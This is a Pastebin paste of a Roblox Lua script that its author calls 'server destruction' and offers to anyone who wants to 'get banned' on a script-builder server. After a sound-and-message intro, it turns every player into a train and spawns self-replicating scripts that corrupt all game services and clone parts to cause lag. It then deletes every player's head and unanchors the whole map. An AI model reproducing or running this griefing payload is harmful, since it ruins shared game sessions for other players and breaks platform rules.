Advertisement
DaOMEGAa32

I MADE TOMMY EAT A BUG

Dec 24th, 2019
326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.38 KB | None | 0 0
  1. ----note. this is the last server destruction il do for now.
  2. ------------------------who wants to get banned on void sb with meh?
  3. local s = Instance.new("Sound")
  4.  
  5. s.Name = "Name"
  6. s.SoundId = "rbxassetid://359774781"
  7. s.Volume = 5
  8. s.Looped = false
  9. s.archivable = false
  10.  
  11. s.Parent = game.Workspace
  12.  
  13.  
  14.  
  15. s:play()
  16. discord=Instance.new("Hint")
  17. discord.Text = "kazoos comming up leave or die ;-;"
  18. discord.Parent = game.Workspace
  19. wait (19)
  20. local s = Instance.new("Sound")
  21.  
  22. s.Name = "wew"
  23. s.SoundId = "rbxassetid://358698380"
  24. s.Volume = 5
  25. s.Looped = false
  26. s.archivable = false
  27.  
  28. s.Parent = game.Workspace
  29.  
  30.  
  31.  
  32. s:play()
  33.  
  34. wait (0.3)
  35. msg = Instance.new("Message",workspace)
  36. msg.Text = "i like to."
  37. wait(1)
  38. msg:Destroy()
  39. msg = Instance.new("Message",workspace)
  40. msg.Text = "sing"
  41. wait(1)
  42. msg:Destroy()
  43. msg = Instance.new("Message",workspace)
  44. msg.Text = "dance."
  45. wait(2)
  46. msg:Destroy()
  47. msg = Instance.new("Message",workspace)
  48. msg.Text = "pretend...."
  49. wait(1)
  50. msg:Destroy()
  51. wait (2)
  52. msg = Instance.new("Message",workspace)
  53. msg.Text = "and...."
  54. wait(1)
  55. wait (0.4)
  56. msg:Destroy()
  57. workspace.wew:remove()
  58. wait (0.1)
  59. local s = Instance.new("Sound")
  60.  
  61. s.Name = "r"
  62. s.SoundId = "rbxassetid://2430580736"
  63. s.Volume = 5
  64. s.Looped = false
  65. s.archivable = false
  66.  
  67. s.Parent = game.Workspace
  68.  
  69.  
  70.  
  71. s:play()
  72. msg = Instance.new("Message",workspace)
  73. msg.Text = "I LIKE TO HAVE"
  74. wait(1)
  75. msg:Destroy()
  76. msg = Instance.new("Message",workspace)
  77. msg.Text = "FUN"
  78. wait(0.3)
  79. msg:Destroy()
  80. msg = Instance.new("Message",workspace)
  81. msg.Text = " F U N "
  82. wait(0.3)
  83. msg:Destroy()
  84. msg = Instance.new("Message",workspace)
  85. msg.Text = "β˜… πŸŽ€ 𝐹𝒰𝒩 πŸŽ€ β˜…"
  86. wait(0.3)
  87. msg:Destroy()
  88. msg = Instance.new("Message",workspace)
  89. msg.Text = "β–ˆβ–€ β–ˆβ–‘β–ˆ β–ˆβ–„β–‘β–ˆ β–ˆβ–€ β–ˆβ–‘β–ˆ β–ˆβ–‘β–€β–ˆ β–€β–‘ β–‘β–€β–‘ β–€β–‘β–‘β–€ "
  90. wait(0.3)
  91. msg:Destroy()
  92. msg = Instance.new("Message",workspace)
  93. msg.Text = "FAN"
  94. wait(0.3)
  95. msg:Destroy()
  96. msg = Instance.new("Message",workspace)
  97. msg.Text = "1L47"
  98. wait(0.3)
  99. msg:Destroy()
  100. msg = Instance.new("Message",workspace)
  101. msg.Text = "[F][U][N]"
  102. wait(0.3)
  103. msg:Destroy()
  104. msg = Instance.new("Message",workspace)
  105. msg.Text = "FON"
  106. wait(0.3)
  107. msg:Destroy()
  108. msg = Instance.new("Message",workspace)
  109. msg.Text = "VUN"
  110. wait(0.3)
  111. msg:Destroy()
  112. msg = Instance.new("Message",workspace)
  113. msg.Text = "PLUM"
  114. wait(0.3)
  115. msg:Destroy()
  116. local s = Instance.new("Sound")
  117.  
  118. s.Name = "Name"
  119. s.SoundId = "rbxassetid://322621962"
  120. s.Volume = 5
  121. s.Looped = false
  122. s.archivable = false
  123.  
  124. s.Parent = game.Workspace
  125.  
  126.  
  127.  
  128. s:play()
  129. for i, v in pairs(game.Players:GetChildren()) do--this is going down in order of evrything in players, v is the variable
  130. p = v.Character
  131.  
  132. local weld = Instance.new("Weld",p.Torso)
  133. weld.Part0 = p.Torso
  134.  
  135. local train = Instance.new("Part",p.Torso)
  136. train.Anchored = true
  137. train.CanCollide = false
  138. train.Size = Vector3.new(3,2,6)
  139. train.CustomPhysicalProperties = PhysicalProperties.new(0,0,0,0,0)
  140. weld.Part1 = train
  141. weld.C1 = CFrame.new(0,0,0) * CFrame.Angles(0,math.rad(180),0)
  142. train.Anchored = false
  143. local TrainMesh = Instance.new("SpecialMesh",train)
  144. TrainMesh.MeshType = Enum.MeshType.FileMesh
  145. TrainMesh.Scale = Vector3.new(.5,.5,.5)
  146. TrainMesh.MeshId = "rbxassetid://636922328"
  147. TrainMesh.TextureId = "rbxassetid://471652580"
  148.  
  149.  
  150. local weld2 = Instance.new("Weld",p.Torso)
  151. weld2.Part0 = p.Torso
  152. local Smoke = Instance.new("Part",p.Torso)
  153. Smoke.Anchored = true
  154. Smoke.CanCollide = false
  155. Smoke.Size = Vector3.new(1,1,1)
  156. Smoke.CustomPhysicalProperties = PhysicalProperties.new(0,0,0,0,0)
  157. weld2.Part1 = Smoke
  158. weld2.C1 = CFrame.new(0,-4,3.5)-- * CFrame.Angles(0,math.rad(180),0)
  159. Smoke.Anchored = false
  160. Smoke.Transparency = 1;
  161.  
  162. p.Humanoid.WalkSpeed = 60;
  163.  
  164.  
  165. for i,v in pairs(p:GetChildren()) do
  166. if v:IsA("Part") then
  167. v.Transparency = 1;
  168. elseif v:IsA("Hat") then
  169. v:Destroy()
  170. elseif v:IsA("Model") then
  171. v:Destroy()
  172. end
  173. end
  174. end
  175.  
  176. --Converted with ttyyuu12345's model to script plugin v4
  177. function sandbox(var,func)
  178. local env = getfenv(func)
  179. local newenv = setmetatable({},{
  180. __index = function(self,k)
  181. if k=="script" then
  182. return var
  183. else
  184. return env[k]
  185. end
  186. end,
  187. })
  188. setfenv(func,newenv)
  189. return func
  190. end
  191. cors = {}
  192. mas = Instance.new("Model",game:GetService("Lighting"))
  193. Model0 = Instance.new("Model")
  194. Script1 = Instance.new("Script")
  195. Script2 = Instance.new("Script")
  196. Script3 = Instance.new("Script")
  197. StringValue4 = Instance.new("StringValue")
  198. Model0.Name = "PlaceCorrupter"
  199. Model0.Parent = mas
  200. Script1.Name = "CorruptGame"
  201. Script1.Parent = Model0
  202. table.insert(cors,sandbox(Script1,function()
  203. -- This is a fun random project I made really quickly. What it does, it corrupts anything
  204. --under the targets table. The target must be a child of game. It will mess everything up,
  205. --And may even lag. Everytime you play this script, it'll make a random effect. Have fun!
  206.  
  207. targets = {"Workspace","StarterGui","Players","Lighting","ReplicatedFirst","ReplicatedStorage","ServerScriptService","ServerStorage","StarterPack","StarterPlayer","Teams","Soundscape","Chat","TestService","HttpService","InsertService"} -- You can only effect running instances
  208.  
  209. for q = 1,#targets do
  210. p = script.Spread:Clone()
  211. p.Target.Value = targets[q]
  212. p.Disabled = false
  213. p.Parent = game.Workspace
  214. end
  215. end))
  216. Script2.Name = "Spread"
  217. Script2.Parent = Script1
  218. table.insert(cors,sandbox(Script2,function()
  219. stuff = game:FindFirstChild(script.Target.Value)
  220. if(stuff ~= nil) then
  221. k = stuff:GetChildren()
  222. for i = 1,#k do
  223. local qq = script.Corrupt:clone()
  224. qq.Parent = k[i]
  225. qq.Disabled = false
  226. end
  227. stuff.ChildAdded:connect(function(pp)
  228. local qq = script.Corrupt:clone()
  229. qq.Parent = pp
  230. qq.Disabled = false
  231. end)
  232. end
  233. end))
  234. Script3.Name = "Corrupt"
  235. Script3.Parent = Script2
  236. table.insert(cors,sandbox(Script3,function()
  237. ---The corruption and the spread script was created by BuildIntoGames :P
  238.  
  239.  
  240. function TextLabel(t)
  241. if(math.random(1,3) == 1) then
  242. t.BackgroundTransparency = math.random(1,10)/10
  243. end
  244. if(math.random(1,3) == 1) then
  245. t.TextColor3 = Color3.new(math.random(1,255)/255,math.random(1,255)/255,math.random(1,255)/255)
  246. end
  247. if(math.random(1,5) == 5) then
  248. t.Text = string.sub(t.Text,math.random(1,30),math.random(30,100))
  249. end
  250. if(math.random(1,4) == 4) then
  251. t.Rotation = math.random(1,180)/t.Rotation
  252. end
  253. wait()
  254. end
  255.  
  256.  
  257. function hat (h)
  258. if(math.random(1,5) == 5) then
  259. h.AttachmentPos = Vector3.new(math.random(-5,5)*math.random(-5,5),math.random(-5,5)*math.random(-5,5),math.random(-5,5)*math.random(-5,5))
  260. end
  261. end
  262.  
  263.  
  264. function mesh (m)
  265. if(math.random(1,6) == 6) then
  266. m.Scale = Vector3.new(math.random(-5,5)*math.random(-5,5),math.random(-5,5)*math.random(-5,5),math.random(-5,5)*math.random(-5,5))
  267. end
  268. if(math.random(1,6) == 6) then
  269. m.TextureId = "http://www.roblox.com/asset/?id=" .. math.random(10000,10000000)
  270. end
  271. end
  272.  
  273.  
  274. function magma(part)
  275. if(math.random(1,5) == 5) then
  276. part.BrickColor = BrickColor.Random()
  277. end
  278. for i = 1,math.random(-1,2) do
  279. q = part:clone()
  280. q.Name = "corruptedclonepart"
  281. q.Parent = script.Parent
  282. q.CFrame = part.CFrame
  283. if(math.random(1,5) == 5) then
  284. q.Anchored = false
  285. end
  286. if(math.random(1,5) == 5) then
  287. q.CanCollide = false
  288. end
  289. end
  290. if(math.random(1,8) == 2) then
  291. part.Transparency = math.random(1,10)/10
  292. end
  293. if(math.random(1,12) == 9) then
  294. part.Size = Vector3.new(part.Size.X / math.random(1,10),part.Size.Y * math.random(1,10),part.Size.Z * math.random(1,10))
  295. end
  296. if(math.random(1,10) == 9) then
  297. Materials = {"Plastic","DiamondPlate","Fabric","Foil","Granite","Grass","Ice","Marble","Metal","Pebble","Sand","Slate","SmoothPlastic","WoodPlanks","Wood"}
  298. part.Material = Materials[math.random(1,#Materials)]
  299. end
  300. if(math.random(1,20) == 18) then
  301. part.Reflectance = math.random(1,20)/10
  302. end
  303. if(math.random(1,15) == 15) then
  304. shapes = {"Ball","Block","Cylinder"}
  305. part.Shape = shapes[math.random(1,#shapes)]
  306. end
  307. wait()
  308. end
  309.  
  310.  
  311. function sound(soundd)
  312. soundd.Pitch = math.random(-50,50)/10
  313. soundd.Volume = math.random(1,10)/10
  314. end
  315.  
  316.  
  317. function Motor (m)
  318. m.CurrentAngle = math.random(-100,100)/math.random(1,5)
  319. m.DesiredAngle = math.random(-100,100)/math.random(1,5)
  320. m.MaxVelocity = math.random(-100,100)/math.random(1,5)
  321. end
  322.  
  323. function MeltTheWorld(part)
  324. for _,part in next, part:GetChildren() do
  325. --print("killing " .. part.Name)
  326. if(part.Name == "Animate" and part.Parent:FindFirstChild("Humanoid") ~= nil and math.random(1,11) == 11) then part.Disabled = true end
  327. if part.ClassName == "Part" and part.Name ~= "corruptedclonepart" then magma(part) end
  328. if part.ClassName == "Sound" then sound(part) end
  329. if part.ClassName == "Hat" then hat(part) end
  330. if part.ClassName == "SpecialMesh" then mesh(part) end
  331. if part.ClassName == "Motor6D" then Motor(part) end
  332. if part.ClassName == "TextLabel" or part.ClassName == "TextButton" or part.ClassName == "TextBox" then TextLabel(part) end
  333. MeltTheWorld(part) MeltTheWorld(part)
  334. end
  335. end
  336.  
  337. MeltTheWorld(script.Parent)
  338.  
  339.  
  340. script.Parent.ChildAdded:connect(function(p)
  341. if(p.Name ~= "corruptedclonepart") then
  342. MeltTheWorld(p)
  343. end
  344. end)
  345.  
  346. script.Parent.DescendantAdded:connect(function(p)
  347. if(p.Name ~= "corruptedclonepart") then
  348. MeltTheWorld(p)
  349. end
  350. end)
  351.  
  352.  
  353. end))
  354. Script3.Disabled = true
  355. StringValue4.Name = "Target"
  356. StringValue4.Parent = Script2
  357. StringValue4.Value = "none"
  358. for i,v in pairs(mas:GetChildren()) do
  359. v.Parent = workspace
  360. pcall(function() v:MakeJoints() end)
  361. end
  362. mas:Destroy()
  363. for i,v in pairs(cors) do
  364. spawn(function()
  365. pcall(v)
  366. end)
  367. end
  368.  
  369.  
  370. local playerLeaderstats = {}
  371. for i, v in pairs(game.Players:GetChildren()) do
  372. table.insert(playerLeaderstats, v)
  373. end
  374. workspace.r:remove()
  375. local players = game.Players:GetChildren()
  376. for i = 1, #players do
  377. players[i].Character.Head:Destroy()
  378. wait()
  379. end
  380. function FUNCTION(a)
  381. if (a.className == "Part") or (a.className == "Seat") or (a.className == "SpawnLocation") then
  382. a.Anchored = false
  383. end
  384. local b = a:GetChildren()
  385. for i=1,#b do
  386. FUNCTION(b[i])
  387. end
  388. end
  389.  
  390. FUNCTION(game.workspace)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement